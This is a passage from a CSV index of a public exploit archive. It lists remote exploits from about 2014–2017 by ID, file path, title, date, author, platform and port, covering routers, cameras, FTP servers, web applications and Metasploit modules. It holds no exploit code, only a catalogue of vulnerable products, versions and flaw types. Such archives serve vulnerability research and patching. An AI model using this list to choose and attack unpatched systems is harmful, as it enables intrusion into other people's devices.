Request Forgery (Admin Password Manipulation)",2014-04-21,"TUNISIAN CYBER",remote,hardware, +39155,exploits/linux/remote/39155.txt,"lxml - 'clean_html' Security Bypass",2014-04-15,"Maksim Kochkin",remote,linux, +39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows, +39175,exploits/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk - Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,remote,multiple, +39186,exploits/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,remote,multiple, +39194,exploits/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Remote Buffer Overflow",2016-01-07,"RedTeam Pentesting",remote,hardware, +39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware, +39196,exploits/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",remote,linux, +39205,exploits/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",remote,multiple, +39209,exploits/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",remote,hardware, +39215,exploits/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)",2016-01-11,TOMIWA,remote,windows,21 +39218,exploits/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",remote,windows, +39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple, +39224,exploits/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access",2016-01-12,operator8203,remote,hardware,22 +39258,exploits/multiple/remote/39258.txt,"Alfresco - '/proxy?endpoint' Server-Side Request Forgery",2014-07-16,"V. Paulikas",remote,multiple, +39259,exploits/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser?url' Server-Side Request Forgery",2014-07-16,"V. Paulikas",remote,multiple, +39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple, +39278,exploits/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",remote,hardware, +39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple, +39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple, +39295,exploits/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",remote,multiple, +39314,exploits/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",remote,hardware, +39316,exploits/hardware/remote/39316.pl,"Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",remote,hardware, +39318,exploits/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Password Truncation Security",2014-09-16,"Pichaya Morimoto",remote,multiple, +39328,exploits/android/remote/39328.rb,"Google Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,remote,android,5555 +39437,exploits/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,remote,hardware, +39439,exploits/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",remote,jsp, +39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux, +39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80 +39515,exploits/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080 +39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware, +39554,exploits/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,remote,php,80 +39568,exploits/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,remote,hardware,443 +39569,exploits/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,remote,multiple,22 +39585,exploits/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",remote,windows,80 +39596,exploits/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,remote,hardware, +39599,exploits/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",remote,windows, +39631,exploits/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free",2016-03-29,"Google Security Research",remote,multiple, +39632,exploits/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,remote,linux, +39639,exploits/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution (Metasploit)",2016-03-30,Metasploit,remote,php,80 +39640,exploits/android/remote/39640.txt,"Google Android 5.0.1 - Metaphor Stagefright (ASLR Bypass)",2016-03-30,NorthBit,remote,android, +39643,exploits/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,remote,java,8080 +39645,exploits/multiple/remote/39645.php,"PHP 5.5.33/7.0.4 - SNMP Format String",2016-04-01,"Andrew Kramer",remote,multiple, +39693,exploits/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,remote,unix, +39698,exploits/windows/remote/39698.html,"Microsoft Internet Explorer 9/10/11 - 'CDOMStringDataList::InitFromString' Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",remote,windows, +39708,exploits/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload (Metasploit)",2016-04-18,Metasploit,remote,multiple,80 +39729,exploits/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",remote,win_x86,21 +39735,exploits/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,remote,windows,80 +39736,exploits/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",remote,linux, +39742,exploits/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",remote,php, +39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa",remote,windows, +39756,exploits/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-05-02,Metasploit,remote,linux,8080 +39783,exploits/windows/remote/39783.py,"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,remote,windows, +39792,exploits/ruby/remote/39792.rb,"Ruby on Rails - Development Web Console (v2) Code Execution (Metasploit)",2016-05-09,Metasploit,remote,ruby,3000 +39805,exploits/windows/remote/39805.txt,"Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",remote,windows, +39823,exploits/hardware/remote/39823.py,"Cisco ASA Software 8.x/9.x - IKEv1 / IKEv2 Buffer Overflow",2016-05-17,"Exodus Intelligence",remote,hardware, +39836,exploits/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection (Metasploit)",2016-05-17,Metasploit,remote,multiple, +39852,exploits/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)",2016-05-25,Metasploit,remote,java,8088 +39853,exploits/unix/remote/39853.rb,"Ubiquiti airOS - Arbitrary File Upload (Metasploit)",2016-05-25,Metasploit,remote,unix,443 +39854,exploits/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",remote,java, +39858,exploits/windows/remote/39858.py,"HP Data Protector A.09.00 - Arbitrary Command Execution",2016-05-26,"Ian Lovering",remote,windows, +39874,exploits/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",remote,windows, +39907,exploits/windows/remote/39907.rb,"Poison Ivy 2.1.x (C2 Server) - Remote Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",remote,windows,3460 +39917,exploits/cgi/remote/39917.rb,"IPFire - 'proxy.cgi' Remote Code Execution (Metasploit)",2016-06-10,Metasploit,remote,cgi,444 +39918,exploits/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Command Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,remote,cgi,444 +39919,exploits/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,remote,multiple,8080 +40441,exploits/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,remote,hardware, +39945,exploits/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution (Metasploit)",2016-06-14,Metasploit,remote,linux,8080 +39958,exploits/linux/remote/39958.rb,"Bomgar Remote Support - Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",remote,linux,443 +39973,exploits/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution (Metasploit)",2016-06-17,Metasploit,remote,linux,443 +39985,exploits/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",remote,windows,1604 +39999,exploits/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,remote,win_x86-64,21 +40004,exploits/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,remote,php,80 +40064,exploits/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",remote,linux, +40067,exploits/linux/remote/40067.rb,"Nagios XI Chained - Remote Code Execution (Metasploit)",2016-07-06,Metasploit,remote,linux,80 +40108,exploits/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution (Metasploit)",2016-07-13,Metasploit,remote,linux,443 +40113,exploits/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (PoC)",2016-07-18,"Eddie Harari",remote,linux,22 +40119,exploits/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,remote,linux, +40120,exploits/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,remote,hardware, +40846,exploits/android/remote/40846.html,"Google Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",remote,android, +40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,remote,multiple, +40130,exploits/php/remote/40130.rb,"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",remote,php,80 +40136,exploits/linux/remote/40136.py,"OpenSSH 7.2p2 - Username Enumeration",2016-07-20,0_o,remote,linux,22 +40138,exploits/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Remote Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",remote,windows,69 +40142,exploits/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,remote,php, +40144,exploits/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution",2016-07-23,Raz0r,remote,php, +40146,exploits/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,remote,linux,8000 +40147,exploits/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,remote,linux,8000 +40162,exploits/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)",2016-07-26,xort,remote,linux,8000 +40167,exploits/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hard-Coded Credentials Remote Shell Access",2016-07-26,LiquidWorm,remote,linux,23 +40170,exploits/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,remote,python,80 +40176,exploits/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,remote,linux,8000 +40177,exploits/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,remote,linux,8000 +40178,exploits/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,remote,windows,80 +40200,exploits/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",remote,hardware, +40201,exploits/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",remote,linux, +40232,exploits/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,remote,linux, +40280,exploits/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,remote,windows, +40234,exploits/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow",2012-03-03,Swappage,remote,windows, +40279,exploits/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,remote,windows, +40235,exploits/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,remote,hardware, +40258,exploits/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",remote,hardware,161 +40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware, +40294,exploits/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,remote,php,80 +40436,exploits/android/remote/40436.rb,"Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,remote,android, +40445,exploits/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,remote,windows, +40452,exploits/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow",2016-10-03,Tulpa,remote,windows,80 +40455,exploits/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,remote,windows,80 +40456,exploits/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,remote,windows,80 +40457,exploits/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,remote,windows,80 +40458,exploits/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,remote,windows,80 +40459,exploits/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,remote,windows,80 +40472,exploits/hardware/remote/40472.py,"Billion 7700NR4 Router - Remote Command Execution",2016-10-06,R-73eN,remote,hardware, +40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",remote,hardware, +40491,exploits/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,remote,multiple, +40507,exploits/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,remote,linux, +40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple, +40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware, +40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471 +40610,exploits/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,remote,linux,1099 +40619,exploits/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Command Injection (Shellshock)",2016-10-21,"Hacker Fantastic",remote,hardware, +40633,exploits/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",remote,hardware, +40643,exploits/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,remote,hardware, +40651,exploits/windows/remote/40651.py,"Rumba FTP Client 4.x - Remote Stack Buffer Overflow (SEH)",2016-10-31,"Umit Aksu",remote,windows, +40670,exploits/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Remote Buffer Overflow",2016-10-31,ScrR1pTK1dd13,remote,windows, +40674,exploits/windows/remote/40674.py,"Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow",2016-11-01,Ger,remote,windows, +40672,exploits/windows/remote/40672.py,"Freefloat FTP Server 1.0 - 'RMD' Remote Buffer Overflow",2016-11-01,Karri93,remote,windows, +40673,exploits/windows/remote/40673.py,"Freefloat FTP Server 1.0 - 'HOST' Remote Buffer Overflow",2016-11-01,Cybernetic,remote,windows, +40675,exploits/windows/remote/40675.py,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)",2016-11-01,n30m1nd,remote,windows, +40677,exploits/windows/remote/40677.py,"Freefloat FTP Server 1.0 - 'RENAME' Remote Buffer Overflow",2016-11-01,Eagleblack,remote,windows, +40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows, +40681,exploits/windows/remote/40681.py,"Freefloat FTP Server 1.0 - 'DIR' Remote Buffer Overflow",2016-11-02,ScrR1pTK1dd13,remote,windows, +40689,exploits/linux/remote/40689.rb,"Bassmaster 1.5.1 - Batch Arbitrary JavaScript Injection Remote Code Execution (Metasploit)",2016-11-02,Metasploit,remote,linux, +40693,exploits/windows/remote/40693.py,"WinaXe 7.7 'FTP client' - Remote Buffer Overflow",2016-11-03,hyp3rlinx,remote,windows, +40694,exploits/windows/remote/40694.txt,"Rapid PHP Editor 14.1 - Remote Command Execution",2016-11-03,hyp3rlinx,remote,windows, +40704,exploits/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Remote Buffer Overflow",2016-11-03,Cybernetic,remote,windows, +40711,exploits/windows/remote/40711.py,"Freefloat FTP Server 1.0 - 'SITE ZONE' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows, +40712,exploits/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Remote Buffer Overflow",2016-11-04,Karri93,remote,windows, +40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows, +40714,exploits/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Remote Buffer Overflow",2016-11-04,"Pablo González",remote,windows, +40715,exploits/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,remote,windows, +40720,exploits/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",remote,hardware, +40721,exploits/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11 / IIS / CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,remote,windows, +40758,exploits/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow (Metasploit)",2016-11-14,Metasploit,remote,windows, +40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40735,exploits/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40740,exploits/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,remote,linux_mips,7547 +40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,remote,windows, +40778,exploits/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,remote,windows, +40805,exploits/multiple/remote/40805.rb,"D-Link DIR-Series Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,remote,multiple,80 +40813,exploits/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",remote,hardware, +40824,exploits/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",remote,multiple,80 +40830,exploits/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,remote,windows, +40831,exploits/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,remote,windows, +40833,exploits/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,remote,windows, +40832,exploits/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,remote,windows, +40834,exploits/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,remote,windows, +40835,exploits/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,remote,windows, +40854,exploits/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Remote Buffer Overflow",2016-12-01,vportal,remote,windows, +40857,exploits/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",remote,windows, +40858,exploits/hardware/remote/40858.py,"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution",2016-12-04,"Jeremy Brown",remote,hardware, +40862,exploits/windows/remote/40862.py,"Alcatel Lucent Omnivista 8770 - Remote Code Execution",2016-12-04,malerisch,remote,windows, +40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware, +40868,exploits/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Remote Buffer Overflow (SEH)",2016-12-05,vportal,remote,windows, +40869,exploits/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Remote Buffer Overflow",2016-12-05,vportal,remote,windows, +40881,exploits/windows/remote/40881.html,"Microsoft Internet Explorer 9 - 'jscript9' Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,remote,windows, +40911,exploits/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",remote,linux, +40916,exploits/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",remote,linux, +40920,exploits/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",remote,linux, +40930,exploits/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,remote,osx, +40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80 +40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22 +40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows, +40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows, +41003,exploits/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Remote Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",remote,windows, +41013,exploits/linux/remote/41013.txt,"Ansible 2.1.4/2.2.1 - Command Execution",2017-01-09,Computest,remote,linux, +41041,exploits/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)",2017-01-13,Metasploit,remote,linux, +41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows, +41079,exploits/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,remote,windows,80 +41146,exploits/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,remote,windows,80 +41148,exploits/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Remote Command Execution",2017-01-24,"Google Security Research",remote,windows, +41151,exploits/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,remote,windows, +41153,exploits/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",remote,windows, +41162,exploits/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,remote,linux, +41233,exploits/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,remote,linux, +41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware, +41297,exploits/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,remote,multiple, +41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware, +41358,exploits/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,remote,php,80 +41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",remote,java, +41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",remote,windows, +41443,exploits/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",remote,macos, +41471,exploits/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,remote,arm, +41479,exploits/windows/remote/41479.py,"SysGauge 1.5.18 - 